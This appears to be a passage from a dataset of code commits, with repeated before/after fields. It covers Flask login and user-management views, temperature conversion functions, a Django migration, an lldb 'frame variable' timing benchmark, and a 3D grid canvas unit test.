confirm_login,
fresh_login_required)
from maediprojects import app, db, models
from maediprojects.query import user as quser
from maediprojects.lib import codelists
login_manager = LoginManager()
login_manager.setup_app(app)
login_manager.login_view = "login"
@login_manager.user_loader
def load_user(id):
return quser.user(id)
@app.route("/users/")
@login_required
def users():
users = quser.user()
return render_template("users.html",
users = users,
loggedinuser=current_user)
@app.route("/users/new/", methods=["GET", "POST"])
@login_required
def users_new():
if request.method=="GET":
user = {}
return render_template("user.html",
user = user,
loggedinuser=current_user,
codelists = codelists.get_codelists())
elif request.method == "POST":
if quser.addUser(request.form):
flash("Successfully created user!", "success")
else:
flash("Sorry, couldn't create that user!", "danger")
return redirect(url_for("users"))
@app.route("/users/<user_id>/", methods=["GET", "POST"])
@login_required
def users_edit(user_id):
if request.method=="GET":
user = quser.user(user_id)
return render_template("user.html",
user = user,
loggedinuser=current_user,
codelists = codelists.get_codelists())
elif request.method == "POST":
if quser.updateUser(request.form):
flash("Successfully updated user!", "success")
else:
flash("Sorry, couldn't update that user!", "danger")
return redirect(url_for("users"))
@app.route("/login/", methods=["GET", "POST"])
def login():
if request.method == "POST" and "username" in request.form:
user = quser.user_by_username(request.form["username"])
if (user and user.check_password(request.form["password"])):
if login_user(user):
flash("Logged in!", "success")
if request.args.get("next"):
redir_url = request.script_root + request.args.get("next")
else:
redir_url = url_for("dashboard")
return redirect(redir_url)
else:
flash("Sorry, but you could not log in.", "danger")
else:
flash(u"Invalid username or password.", "danger")
return render_template("login.html",
loggedinuser=current_user)
@app.route('/logout/')
@login_required
def logout():
logout_user()
flash('Logged out', 'success')
redir_url = url_for("dashboard")
return redirect(redir_url)
|
<commit_before><commit_msg>Add views on to user management functions<commit_after>
|
from flask import Flask, render_template, flash, request, Markup, \
session, redirect, url_for, escape, Response, abort, send_file, \
current_app
from flask.ext.login import (LoginManager, current_user, login_required,
login_user, logout_user, UserMixin,
confirm_login,
fresh_login_required)
from maediprojects import app, db, models
from maediprojects.query import user as quser
from maediprojects.lib import codelists
login_manager = LoginManager()
login_manager.setup_app(app)
login_manager.login_view = "login"
@login_manager.user_loader
def load_user(id):
return quser.user(id)
@app.route("/users/")
@login_required
def users():
users = quser.user()
return render_template("users.html",
users = users,
loggedinuser=current_user)
@app.route("/users/new/", methods=["GET", "POST"])
@login_required
def users_new():
if request.method=="GET":
user = {}
return render_template("user.html",
user = user,
loggedinuser=current_user,
codelists = codelists.get_codelists())
elif request.method == "POST":
if quser.addUser(request.form):
flash("Successfully created user!", "success")
else:
flash("Sorry, couldn't create that user!", "danger")
return redirect(url_for("users"))
@app.route("/users/<user_id>/", methods=["GET", "POST"])
@login_required
def users_edit(user_id):
if request.method=="GET":
user = quser.user(user_id)
return render_template("user.html",
user = user,
loggedinuser=current_user,
codelists = codelists.get_codelists())
elif request.method == "POST":
if quser.updateUser(request.form):
flash("Successfully updated user!", "success")
else:
flash("Sorry, couldn't update that user!", "danger")
return redirect(url_for("users"))
@app.route("/login/", methods=["GET", "POST"])
def login():
if request.method == "POST" and "username" in request.form:
user = quser.user_by_username(request.form["username"])
if (user and user.check_password(request.form["password"])):
if login_user(user):
flash("Logged in!", "success")
if request.args.get("next"):
redir_url = request.script_root + request.args.get("next")
else:
redir_url = url_for("dashboard")
return redirect(redir_url)
else:
flash("Sorry, but you could not log in.", "danger")
else:
flash(u"Invalid username or password.", "danger")
return render_template("login.html",
loggedinuser=current_user)
@app.route('/logout/')
@login_required
def logout():
logout_user()
flash('Logged out', 'success')
redir_url = url_for("dashboard")
return redirect(redir_url)
|
Add views on to user management functionsfrom flask import Flask, render_template, flash, request, Markup, \
session, redirect, url_for, escape, Response, abort, send_file, \
current_app
from flask.ext.login import (LoginManager, current_user, login_required,
login_user, logout_user, UserMixin,
confirm_login,
fresh_login_required)
from maediprojects import app, db, models
from maediprojects.query import user as quser
from maediprojects.lib import codelists
login_manager = LoginManager()
login_manager.setup_app(app)
login_manager.login_view = "login"
@login_manager.user_loader
def load_user(id):
return quser.user(id)
@app.route("/users/")
@login_required
def users():
users = quser.user()
return render_template("users.html",
users = users,
loggedinuser=current_user)
@app.route("/users/new/", methods=["GET", "POST"])
@login_required
def users_new():
if request.method=="GET":
user = {}
return render_template("user.html",
user = user,
loggedinuser=current_user,
codelists = codelists.get_codelists())
elif request.method == "POST":
if quser.addUser(request.form):
flash("Successfully created user!", "success")
else:
flash("Sorry, couldn't create that user!", "danger")
return redirect(url_for("users"))
@app.route("/users/<user_id>/", methods=["GET", "POST"])
@login_required
def users_edit(user_id):
if request.method=="GET":
user = quser.user(user_id)
return render_template("user.html",
user = user,
loggedinuser=current_user,
codelists = codelists.get_codelists())
elif request.method == "POST":
if quser.updateUser(request.form):
flash("Successfully updated user!", "success")
else:
flash("Sorry, couldn't update that user!", "danger")
return redirect(url_for("users"))
@app.route("/login/", methods=["GET", "POST"])
def login():
if request.method == "POST" and "username" in request.form:
user = quser.user_by_username(request.form["username"])
if (user and user.check_password(request.form["password"])):
if login_user(user):
flash("Logged in!", "success")
if request.args.get("next"):
redir_url = request.script_root + request.args.get("next")
else:
redir_url = url_for("dashboard")
return redirect(redir_url)
else:
flash("Sorry, but you could not log in.", "danger")
else:
flash(u"Invalid username or password.", "danger")
return render_template("login.html",
loggedinuser=current_user)
@app.route('/logout/')
@login_required
def logout():
logout_user()
flash('Logged out', 'success')
redir_url = url_for("dashboard")
return redirect(redir_url)
|
<commit_before><commit_msg>Add views on to user management functions<commit_after>from flask import Flask, render_template, flash, request, Markup, \
session, redirect, url_for, escape, Response, abort, send_file, \
current_app
from flask.ext.login import (LoginManager, current_user, login_required,
login_user, logout_user, UserMixin,
confirm_login,
fresh_login_required)
from maediprojects import app, db, models
from maediprojects.query import user as quser
from maediprojects.lib import codelists
login_manager = LoginManager()
login_manager.setup_app(app)
login_manager.login_view = "login"
@login_manager.user_loader
def load_user(id):
return quser.user(id)
@app.route("/users/")
@login_required
def users():
users = quser.user()
return render_template("users.html",
users = users,
loggedinuser=current_user)
@app.route("/users/new/", methods=["GET", "POST"])
@login_required
def users_new():
if request.method=="GET":
user = {}
return render_template("user.html",
user = user,
loggedinuser=current_user,
codelists = codelists.get_codelists())
elif request.method == "POST":
if quser.addUser(request.form):
flash("Successfully created user!", "success")
else:
flash("Sorry, couldn't create that user!", "danger")
return redirect(url_for("users"))
@app.route("/users/<user_id>/", methods=["GET", "POST"])
@login_required
def users_edit(user_id):
if request.method=="GET":
user = quser.user(user_id)
return render_template("user.html",
user = user,
loggedinuser=current_user,
codelists = codelists.get_codelists())
elif request.method == "POST":
if quser.updateUser(request.form):
flash("Successfully updated user!", "success")
else:
flash("Sorry, couldn't update that user!", "danger")
return redirect(url_for("users"))
@app.route("/login/", methods=["GET", "POST"])
def login():
if request.method == "POST" and "username" in request.form:
user = quser.user_by_username(request.form["username"])
if (user and user.check_password(request.form["password"])):
if login_user(user):
flash("Logged in!", "success")
if request.args.get("next"):
redir_url = request.script_root + request.args.get("next")
else:
redir_url = url_for("dashboard")
return redirect(redir_url)
else:
flash("Sorry, but you could not log in.", "danger")
else:
flash(u"Invalid username or password.", "danger")
return render_template("login.html",
loggedinuser=current_user)
@app.route('/logout/')
@login_required
def logout():
logout_user()
flash('Logged out', 'success')
redir_url = url_for("dashboard")
return redirect(redir_url)
|
|
e0cd375fbd7085a989f73da1259fe70a1c50bd36
|
src/test_functions.py
|
src/test_functions.py
|
def k_to_c(temp):
return temp - 273.15
def f_to_k(temp):
return ((temp - 32) * (5 / 9)) + 273.15
def f_to_c(temp):
temp_k = f_to_k(temp)
result = k_to_c(temp_k)
return result
|
Add a test python function
|
Add a test python function
|
Python
|
mit
|
xykang/2015-05-12-BUSM-git,xykang/2015-05-12-BUSM-git
|
Add a test python function
|
def k_to_c(temp):
return temp - 273.15
def f_to_k(temp):
return ((temp - 32) * (5 / 9)) + 273.15
def f_to_c(temp):
temp_k = f_to_k(temp)
result = k_to_c(temp_k)
return result
|
<commit_before><commit_msg>Add a test python function<commit_after>
|
def k_to_c(temp):
return temp - 273.15
def f_to_k(temp):
return ((temp - 32) * (5 / 9)) + 273.15
def f_to_c(temp):
temp_k = f_to_k(temp)
result = k_to_c(temp_k)
return result
|
Add a test python functiondef k_to_c(temp):
return temp - 273.15
def f_to_k(temp):
return ((temp - 32) * (5 / 9)) + 273.15
def f_to_c(temp):
temp_k = f_to_k(temp)
result = k_to_c(temp_k)
return result
|
<commit_before><commit_msg>Add a test python function<commit_after>def k_to_c(temp):
return temp - 273.15
def f_to_k(temp):
return ((temp - 32) * (5 / 9)) + 273.15
def f_to_c(temp):
temp_k = f_to_k(temp)
result = k_to_c(temp_k)
return result
|
|
6be9586a81ef426620ea33e61d8ad1137746d6f8
|
webtool/server/migrations/0029_auto_20181216_1323.py
|
webtool/server/migrations/0029_auto_20181216_1323.py
|
# -*- coding: utf-8 -*-
# Generated by Django 1.11.6 on 2018-12-16 12:23
from __future__ import unicode_literals
import django.core.validators
from django.db import migrations, models
import re
class Migration(migrations.Migration):
dependencies = [
('server', '0028_auto_20181211_1333'),
]
operations = [
migrations.AlterField(
model_name='profile',
name='member_id',
field=models.CharField(help_text='Format:sss-oo-mmmmmm s=Sektionsnummer(008) o=Ortsgruppe(00|01) m=Mitgliedsnummer', max_length=13, null=True, unique=True, blank=True, validators=[django.core.validators.RegexValidator(re.compile('\\d{3}-\\d{2}-\\d{6}', 32), 'Bitte auf den richtigen Aufbau achten')], verbose_name='MitgliedsNr'),
),
]
|
Improve member_id field (We need the possibility of meber_id = NULL)
|
Improve member_id field (We need the possibility of meber_id = NULL)
|
Python
|
bsd-2-clause
|
wodo/WebTool3,wodo/WebTool3,wodo/WebTool3,wodo/WebTool3
|
Improve member_id field (We need the possibility of meber_id = NULL)
|
# -*- coding: utf-8 -*-
# Generated by Django 1.11.6 on 2018-12-16 12:23
from __future__ import unicode_literals
import django.core.validators
from django.db import migrations, models
import re
class Migration(migrations.Migration):
dependencies = [
('server', '0028_auto_20181211_1333'),
]
operations = [
migrations.AlterField(
model_name='profile',
name='member_id',
field=models.CharField(help_text='Format:sss-oo-mmmmmm s=Sektionsnummer(008) o=Ortsgruppe(00|01) m=Mitgliedsnummer', max_length=13, null=True, unique=True, blank=True, validators=[django.core.validators.RegexValidator(re.compile('\\d{3}-\\d{2}-\\d{6}', 32), 'Bitte auf den richtigen Aufbau achten')], verbose_name='MitgliedsNr'),
),
]
|
<commit_before><commit_msg>Improve member_id field (We need the possibility of meber_id = NULL)<commit_after>
|
# -*- coding: utf-8 -*-
# Generated by Django 1.11.6 on 2018-12-16 12:23
from __future__ import unicode_literals
import django.core.validators
from django.db import migrations, models
import re
class Migration(migrations.Migration):
dependencies = [
('server', '0028_auto_20181211_1333'),
]
operations = [
migrations.AlterField(
model_name='profile',
name='member_id',
field=models.CharField(help_text='Format:sss-oo-mmmmmm s=Sektionsnummer(008) o=Ortsgruppe(00|01) m=Mitgliedsnummer', max_length=13, null=True, unique=True, blank=True, validators=[django.core.validators.RegexValidator(re.compile('\\d{3}-\\d{2}-\\d{6}', 32), 'Bitte auf den richtigen Aufbau achten')], verbose_name='MitgliedsNr'),
),
]
|
Improve member_id field (We need the possibility of meber_id = NULL)# -*- coding: utf-8 -*-
# Generated by Django 1.11.6 on 2018-12-16 12:23
from __future__ import unicode_literals
import django.core.validators
from django.db import migrations, models
import re
class Migration(migrations.Migration):
dependencies = [
('server', '0028_auto_20181211_1333'),
]
operations = [
migrations.AlterField(
model_name='profile',
name='member_id',
field=models.CharField(help_text='Format:sss-oo-mmmmmm s=Sektionsnummer(008) o=Ortsgruppe(00|01) m=Mitgliedsnummer', max_length=13, null=True, unique=True, blank=True, validators=[django.core.validators.RegexValidator(re.compile('\\d{3}-\\d{2}-\\d{6}', 32), 'Bitte auf den richtigen Aufbau achten')], verbose_name='MitgliedsNr'),
),
]
|
<commit_before><commit_msg>Improve member_id field (We need the possibility of meber_id = NULL)<commit_after># -*- coding: utf-8 -*-
# Generated by Django 1.11.6 on 2018-12-16 12:23
from __future__ import unicode_literals
import django.core.validators
from django.db import migrations, models
import re
class Migration(migrations.Migration):
dependencies = [
('server', '0028_auto_20181211_1333'),
]
operations = [
migrations.AlterField(
model_name='profile',
name='member_id',
field=models.CharField(help_text='Format:sss-oo-mmmmmm s=Sektionsnummer(008) o=Ortsgruppe(00|01) m=Mitgliedsnummer', max_length=13, null=True, unique=True, blank=True, validators=[django.core.validators.RegexValidator(re.compile('\\d{3}-\\d{2}-\\d{6}', 32), 'Bitte auf den richtigen Aufbau achten')], verbose_name='MitgliedsNr'),
),
]
|
|
d91085396ec4b61e678c32f90dc3f40f44bad121
|
test/benchmarks/frame_variable/TestFrameVariableResponse.py
|
test/benchmarks/frame_variable/TestFrameVariableResponse.py
|
"""Test lldb's response time for 'frame variable' command."""
import os, sys
import unittest2
import lldb
import pexpect
from lldbbench import *
class FrameVariableResponseBench(BenchBase):
mydir = os.path.join("benchmarks", "frame_variable")
def setUp(self):
BenchBase.setUp(self)
if lldb.bmExecutable:
self.exe = lldb.bmExecutable
else:
self.exe = self.lldbHere
if lldb.bmBreakpointSpec:
self.break_spec = lldb.bmBreakpointSpec
else:
self.break_spec = '-n main'
self.count = lldb.bmIterationCount
if self.count <= 0:
self.count = 20
@benchmarks_test
def test_startup_delay(self):
"""Test response time for the 'frame variable' command."""
print
self.run_frame_variable_bench(self.exe, self.break_spec, self.count)
print "lldb frame variable benchmark:", self.stopwatch
def run_frame_variable_bench(self, exe, break_spec, count):
# Set self.child_prompt, which is "(lldb) ".
self.child_prompt = '(lldb) '
prompt = self.child_prompt
# Reset the stopwatchs now.
self.stopwatch.reset()
for i in range(count):
# So that the child gets torn down after the test.
self.child = pexpect.spawn('%s %s %s' % (self.lldbHere, self.lldbOption, exe))
child = self.child
# Turn on logging for what the child sends back.
if self.TraceOn():
child.logfile_read = sys.stdout
# Set our breakpoint.
child.sendline('breakpoint set %s' % break_spec)
child.expect_exact(prompt)
# Run the target and expect it to be stopped due to breakpoint.
child.sendline('run') # Aka 'process launch'.
child.expect_exact(prompt)
with self.stopwatch:
# Measure the 'frame variable' response time.
child.sendline('frame variable')
child.expect_exact(prompt)
child.sendline('quit')
try:
self.child.expect(pexpect.EOF)
except:
pass
# The test is about to end and if we come to here, the child process has
# been terminated. Mark it so.
self.child = None
if __name__ == '__main__':
import atexit
lldb.SBDebugger.Initialize()
atexit.register(lambda: lldb.SBDebugger.Terminate())
unittest2.main()
|
Add a benchmark for measuring the response time of the 'frame variable' command. Example (start the lldb inferior, break at the Driver::MainLoop() function, and issue 'frame variable'):
|
Add a benchmark for measuring the response time of the 'frame variable' command.
Example (start the lldb inferior, break at the Driver::MainLoop() function, and
issue 'frame variable'):
$ ./dotest.py -v +b -x '-F Driver::MainLoop()' -n -p TestFrameVariableResponse.py
----------------------------------------------------------------------
Collected 1 test
1: test_startup_delay (TestFrameVariableResponse.FrameVariableResponseBench)
Test response time for the 'frame variable' command. ...
lldb frame variable benchmark: Avg: 1.636897 (Laps: 20, Total Elapsed Time: 32.737944)
ok
----------------------------------------------------------------------
Ran 1 test in 65.105s
OK
git-svn-id: b33bab8abb5b18c12ee100cd7761ab452d00b2b0@142678 91177308-0d34-0410-b5e6-96231b3b80d8
|
Python
|
apache-2.0
|
apple/swift-lldb,llvm-mirror/lldb,apple/swift-lldb,llvm-mirror/lldb,llvm-mirror/lldb,apple/swift-lldb,llvm-mirror/lldb,apple/swift-lldb,apple/swift-lldb,apple/swift-lldb,llvm-mirror/lldb
|
Add a benchmark for measuring the response time of the 'frame variable' command.
Example (start the lldb inferior, break at the Driver::MainLoop() function, and
issue 'frame variable'):
$ ./dotest.py -v +b -x '-F Driver::MainLoop()' -n -p TestFrameVariableResponse.py
----------------------------------------------------------------------
Collected 1 test
1: test_startup_delay (TestFrameVariableResponse.FrameVariableResponseBench)
Test response time for the 'frame variable' command. ...
lldb frame variable benchmark: Avg: 1.636897 (Laps: 20, Total Elapsed Time: 32.737944)
ok
----------------------------------------------------------------------
Ran 1 test in 65.105s
OK
git-svn-id: b33bab8abb5b18c12ee100cd7761ab452d00b2b0@142678 91177308-0d34-0410-b5e6-96231b3b80d8
|
"""Test lldb's response time for 'frame variable' command."""
import os, sys
import unittest2
import lldb
import pexpect
from lldbbench import *
class FrameVariableResponseBench(BenchBase):
mydir = os.path.join("benchmarks", "frame_variable")
def setUp(self):
BenchBase.setUp(self)
if lldb.bmExecutable:
self.exe = lldb.bmExecutable
else:
self.exe = self.lldbHere
if lldb.bmBreakpointSpec:
self.break_spec = lldb.bmBreakpointSpec
else:
self.break_spec = '-n main'
self.count = lldb.bmIterationCount
if self.count <= 0:
self.count = 20
@benchmarks_test
def test_startup_delay(self):
"""Test response time for the 'frame variable' command."""
print
self.run_frame_variable_bench(self.exe, self.break_spec, self.count)
print "lldb frame variable benchmark:", self.stopwatch
def run_frame_variable_bench(self, exe, break_spec, count):
# Set self.child_prompt, which is "(lldb) ".
self.child_prompt = '(lldb) '
prompt = self.child_prompt
# Reset the stopwatchs now.
self.stopwatch.reset()
for i in range(count):
# So that the child gets torn down after the test.
self.child = pexpect.spawn('%s %s %s' % (self.lldbHere, self.lldbOption, exe))
child = self.child
# Turn on logging for what the child sends back.
if self.TraceOn():
child.logfile_read = sys.stdout
# Set our breakpoint.
child.sendline('breakpoint set %s' % break_spec)
child.expect_exact(prompt)
# Run the target and expect it to be stopped due to breakpoint.
child.sendline('run') # Aka 'process launch'.
child.expect_exact(prompt)
with self.stopwatch:
# Measure the 'frame variable' response time.
child.sendline('frame variable')
child.expect_exact(prompt)
child.sendline('quit')
try:
self.child.expect(pexpect.EOF)
except:
pass
# The test is about to end and if we come to here, the child process has
# been terminated. Mark it so.
self.child = None
if __name__ == '__main__':
import atexit
lldb.SBDebugger.Initialize()
atexit.register(lambda: lldb.SBDebugger.Terminate())
unittest2.main()
|
<commit_before><commit_msg>Add a benchmark for measuring the response time of the 'frame variable' command.
Example (start the lldb inferior, break at the Driver::MainLoop() function, and
issue 'frame variable'):
$ ./dotest.py -v +b -x '-F Driver::MainLoop()' -n -p TestFrameVariableResponse.py
----------------------------------------------------------------------
Collected 1 test
1: test_startup_delay (TestFrameVariableResponse.FrameVariableResponseBench)
Test response time for the 'frame variable' command. ...
lldb frame variable benchmark: Avg: 1.636897 (Laps: 20, Total Elapsed Time: 32.737944)
ok
----------------------------------------------------------------------
Ran 1 test in 65.105s
OK
git-svn-id: b33bab8abb5b18c12ee100cd7761ab452d00b2b0@142678 91177308-0d34-0410-b5e6-96231b3b80d8<commit_after>
|
"""Test lldb's response time for 'frame variable' command."""
import os, sys
import unittest2
import lldb
import pexpect
from lldbbench import *
class FrameVariableResponseBench(BenchBase):
mydir = os.path.join("benchmarks", "frame_variable")
def setUp(self):
BenchBase.setUp(self)
if lldb.bmExecutable:
self.exe = lldb.bmExecutable
else:
self.exe = self.lldbHere
if lldb.bmBreakpointSpec:
self.break_spec = lldb.bmBreakpointSpec
else:
self.break_spec = '-n main'
self.count = lldb.bmIterationCount
if self.count <= 0:
self.count = 20
@benchmarks_test
def test_startup_delay(self):
"""Test response time for the 'frame variable' command."""
print
self.run_frame_variable_bench(self.exe, self.break_spec, self.count)
print "lldb frame variable benchmark:", self.stopwatch
def run_frame_variable_bench(self, exe, break_spec, count):
# Set self.child_prompt, which is "(lldb) ".
self.child_prompt = '(lldb) '
prompt = self.child_prompt
# Reset the stopwatchs now.
self.stopwatch.reset()
for i in range(count):
# So that the child gets torn down after the test.
self.child = pexpect.spawn('%s %s %s' % (self.lldbHere, self.lldbOption, exe))
child = self.child
# Turn on logging for what the child sends back.
if self.TraceOn():
child.logfile_read = sys.stdout
# Set our breakpoint.
child.sendline('breakpoint set %s' % break_spec)
child.expect_exact(prompt)
# Run the target and expect it to be stopped due to breakpoint.
child.sendline('run') # Aka 'process launch'.
child.expect_exact(prompt)
with self.stopwatch:
# Measure the 'frame variable' response time.
child.sendline('frame variable')
child.expect_exact(prompt)
child.sendline('quit')
try:
self.child.expect(pexpect.EOF)
except:
pass
# The test is about to end and if we come to here, the child process has
# been terminated. Mark it so.
self.child = None
if __name__ == '__main__':
import atexit
lldb.SBDebugger.Initialize()
atexit.register(lambda: lldb.SBDebugger.Terminate())
unittest2.main()
|
Add a benchmark for measuring the response time of the 'frame variable' command.
Example (start the lldb inferior, break at the Driver::MainLoop() function, and
issue 'frame variable'):
$ ./dotest.py -v +b -x '-F Driver::MainLoop()' -n -p TestFrameVariableResponse.py
----------------------------------------------------------------------
Collected 1 test
1: test_startup_delay (TestFrameVariableResponse.FrameVariableResponseBench)
Test response time for the 'frame variable' command. ...
lldb frame variable benchmark: Avg: 1.636897 (Laps: 20, Total Elapsed Time: 32.737944)
ok
----------------------------------------------------------------------
Ran 1 test in 65.105s
OK
git-svn-id: b33bab8abb5b18c12ee100cd7761ab452d00b2b0@142678 91177308-0d34-0410-b5e6-96231b3b80d8"""Test lldb's response time for 'frame variable' command."""
import os, sys
import unittest2
import lldb
import pexpect
from lldbbench import *
class FrameVariableResponseBench(BenchBase):
mydir = os.path.join("benchmarks", "frame_variable")
def setUp(self):
BenchBase.setUp(self)
if lldb.bmExecutable:
self.exe = lldb.bmExecutable
else:
self.exe = self.lldbHere
if lldb.bmBreakpointSpec:
self.break_spec = lldb.bmBreakpointSpec
else:
self.break_spec = '-n main'
self.count = lldb.bmIterationCount
if self.count <= 0:
self.count = 20
@benchmarks_test
def test_startup_delay(self):
"""Test response time for the 'frame variable' command."""
print
self.run_frame_variable_bench(self.exe, self.break_spec, self.count)
print "lldb frame variable benchmark:", self.stopwatch
def run_frame_variable_bench(self, exe, break_spec, count):
# Set self.child_prompt, which is "(lldb) ".
self.child_prompt = '(lldb) '
prompt = self.child_prompt
# Reset the stopwatchs now.
self.stopwatch.reset()
for i in range(count):
# So that the child gets torn down after the test.
self.child = pexpect.spawn('%s %s %s' % (self.lldbHere, self.lldbOption, exe))
child = self.child
# Turn on logging for what the child sends back.
if self.TraceOn():
child.logfile_read = sys.stdout
# Set our breakpoint.
child.sendline('breakpoint set %s' % break_spec)
child.expect_exact(prompt)
# Run the target and expect it to be stopped due to breakpoint.
child.sendline('run') # Aka 'process launch'.
child.expect_exact(prompt)
with self.stopwatch:
# Measure the 'frame variable' response time.
child.sendline('frame variable')
child.expect_exact(prompt)
child.sendline('quit')
try:
self.child.expect(pexpect.EOF)
except:
pass
# The test is about to end and if we come to here, the child process has
# been terminated. Mark it so.
self.child = None
if __name__ == '__main__':
import atexit
lldb.SBDebugger.Initialize()
atexit.register(lambda: lldb.SBDebugger.Terminate())
unittest2.main()
|
<commit_before><commit_msg>Add a benchmark for measuring the response time of the 'frame variable' command.
Example (start the lldb inferior, break at the Driver::MainLoop() function, and
issue 'frame variable'):
$ ./dotest.py -v +b -x '-F Driver::MainLoop()' -n -p TestFrameVariableResponse.py
----------------------------------------------------------------------
Collected 1 test
1: test_startup_delay (TestFrameVariableResponse.FrameVariableResponseBench)
Test response time for the 'frame variable' command. ...
lldb frame variable benchmark: Avg: 1.636897 (Laps: 20, Total Elapsed Time: 32.737944)
ok
----------------------------------------------------------------------
Ran 1 test in 65.105s
OK
git-svn-id: b33bab8abb5b18c12ee100cd7761ab452d00b2b0@142678 91177308-0d34-0410-b5e6-96231b3b80d8<commit_after>"""Test lldb's response time for 'frame variable' command."""
import os, sys
import unittest2
import lldb
import pexpect
from lldbbench import *
class FrameVariableResponseBench(BenchBase):
mydir = os.path.join("benchmarks", "frame_variable")
def setUp(self):
BenchBase.setUp(self)
if lldb.bmExecutable:
self.exe = lldb.bmExecutable
else:
self.exe = self.lldbHere
if lldb.bmBreakpointSpec:
self.break_spec = lldb.bmBreakpointSpec
else:
self.break_spec = '-n main'
self.count = lldb.bmIterationCount
if self.count <= 0:
self.count = 20
@benchmarks_test
def test_startup_delay(self):
"""Test response time for the 'frame variable' command."""
print
self.run_frame_variable_bench(self.exe, self.break_spec, self.count)
print "lldb frame variable benchmark:", self.stopwatch
def run_frame_variable_bench(self, exe, break_spec, count):
# Set self.child_prompt, which is "(lldb) ".
self.child_prompt = '(lldb) '
prompt = self.child_prompt
# Reset the stopwatchs now.
self.stopwatch.reset()
for i in range(count):
# So that the child gets torn down after the test.
self.child = pexpect.spawn('%s %s %s' % (self.lldbHere, self.lldbOption, exe))
child = self.child
# Turn on logging for what the child sends back.
if self.TraceOn():
child.logfile_read = sys.stdout
# Set our breakpoint.
child.sendline('breakpoint set %s' % break_spec)
child.expect_exact(prompt)
# Run the target and expect it to be stopped due to breakpoint.
child.sendline('run') # Aka 'process launch'.
child.expect_exact(prompt)
with self.stopwatch:
# Measure the 'frame variable' response time.
child.sendline('frame variable')
child.expect_exact(prompt)
child.sendline('quit')
try:
self.child.expect(pexpect.EOF)
except:
pass
# The test is about to end and if we come to here, the child process has
# been terminated. Mark it so.
self.child = None
if __name__ == '__main__':
import atexit
lldb.SBDebugger.Initialize()
atexit.register(lambda: lldb.SBDebugger.Terminate())
unittest2.main()
|
|
dea65af465b8ffab2a0e85eb0823157253986de7
|
tests/grid_3d_canvas_test.py
|
tests/grid_3d_canvas_test.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
""" Test case for 3D grid canvas.
"""
import unittest
from matplotlib.collections import PathCollection
from catplot.grid_components.grid_canvas import Grid3DCanvas
from catplot.grid_components.nodes import Node3D
class Grid3DCanvasTest(unittest.TestCase):
def setUp(self):
self.maxDiff = True
def test_construction_and_query(self):
""" Test the 2D grid canvas can be constructed corretly.
"""
canvas = Grid3DCanvas()
self.assertListEqual(canvas.nodes, [])
self.assertListEqual(canvas.edges, [])
def test_add_node(self):
""" Make sure we can add node to canvas correctly.
"""
canvas = Grid3DCanvas()
n1 = Node3D([0.5, 0.5, 0.5])
n2 = Node3D([1.0, 1.0, 1.0])
canvas.add_node(n1)
canvas.add_node(n2)
# Check nodes in canvas.
self.assertTrue(canvas.nodes)
for node in canvas.nodes:
self.assertTrue(isinstance(node, Node3D))
# Check colors.
for c in canvas.node_edgecolors:
self.assertEqual(c, "#000000")
for c in canvas.node_colors:
self.assertEqual(c, "#000000")
# Check cooridnates.
ref_coordinates = [[0.5, 0.5, 0.5], [1.0, 1.0, 1.0]]
self.assertListEqual(ref_coordinates, canvas.node_coordinates.tolist())
def test_draw(self):
""" Make sure we can draw in grid canvas without exception raised.
"""
canvas = Grid3DCanvas()
n1 = Node3D([0.5, 0.5, 0.5])
n2 = Node3D([1.0, 1.0, 1.0])
canvas.add_node(n1)
canvas.add_node(n2)
canvas.draw()
if "__main__" == __name__:
suite = unittest.TestLoader().loadTestsFromTestCase(Grid3DCanvasTest)
unittest.TextTestRunner(verbosity=2).run(suite)
|
Add 3d grid canvas test.
|
Add 3d grid canvas test.
|
Python
|
mit
|
PytLab/catplot
|
Add 3d grid canvas test.
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
""" Test case for 3D grid canvas.
"""
import unittest
from matplotlib.collections import PathCollection
from catplot.grid_components.grid_canvas import Grid3DCanvas
from catplot.grid_components.nodes import Node3D
class Grid3DCanvasTest(unittest.TestCase):
def setUp(self):
self.maxDiff = True
def test_construction_and_query(self):
""" Test the 2D grid canvas can be constructed corretly.
"""
canvas = Grid3DCanvas()
self.assertListEqual(canvas.nodes, [])
self.assertListEqual(canvas.edges, [])
def test_add_node(self):
""" Make sure we can add node to canvas correctly.
"""
canvas = Grid3DCanvas()
n1 = Node3D([0.5, 0.5, 0.5])
n2 = Node3D([1.0, 1.0, 1.0])
canvas.add_node(n1)
canvas.add_node(n2)
# Check nodes in canvas.
self.assertTrue(canvas.nodes)
for node in canvas.nodes:
self.assertTrue(isinstance(node, Node3D))
# Check colors.
for c in canvas.node_edgecolors:
self.assertEqual(c, "#000000")
for c in canvas.node_colors:
self.assertEqual(c, "#000000")
# Check cooridnates.
ref_coordinates = [[0.5, 0.5, 0.5], [1.0, 1.0, 1.0]]
self.assertListEqual(ref_coordinates, canvas.node_coordinates.tolist())
def test_draw(self):
""" Make sure we can draw in grid canvas without exception raised.
"""
canvas = Grid3DCanvas()
n1 = Node3D([0.5, 0.5, 0.5])
n2 = Node3D([1.0, 1.0, 1.0])
canvas.add_node(n1)
canvas.add_node(n2)
canvas.draw()
if "__main__" == __name__:
suite = unittest.TestLoader().loadTestsFromTestCase(Grid3DCanvasTest)
unittest.TextTestRunner(verbosity=2).run(suite)
|
<commit_before><commit_msg>Add 3d grid canvas test.<commit_after>
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
""" Test case for 3D grid canvas.
"""
import unittest
from matplotlib.collections import PathCollection
from catplot.grid_components.grid_canvas import Grid3DCanvas
from catplot.grid_components.nodes import Node3D
class Grid3DCanvasTest(unittest.TestCase):
def setUp(self):
self.maxDiff = True
def test_construction_and_query(self):
""" Test the 2D grid canvas can be constructed corretly.
"""
canvas = Grid3DCanvas()
self.assertListEqual(canvas.nodes, [])
self.assertListEqual(canvas.edges, [])
def test_add_node(self):
""" Make sure we can add node to canvas correctly.
"""
canvas = Grid3DCanvas()
n1 = Node3D([0.5, 0.5, 0.5])
n2 = Node3D([1.0, 1.0, 1.0])
canvas.add_node(n1)
canvas.add_node(n2)
# Check nodes in canvas.
self.assertTrue(canvas.nodes)
for node in canvas.nodes:
self.assertTrue(isinstance(node, Node3D))
# Check colors.
for c in canvas.node_edgecolors:
self.assertEqual(c, "#000000")
for c in canvas.node_colors:
self.assertEqual(c, "#000000")
# Check cooridnates.
ref_coordinates = [[0.5, 0.5, 0.5], [1.0, 1.0, 1.0]]
self.assertListEqual(ref_coordinates, canvas.node_coordinates.tolist())
def test_draw(self):
""" Make sure we can draw in grid canvas without exception raised.
"""
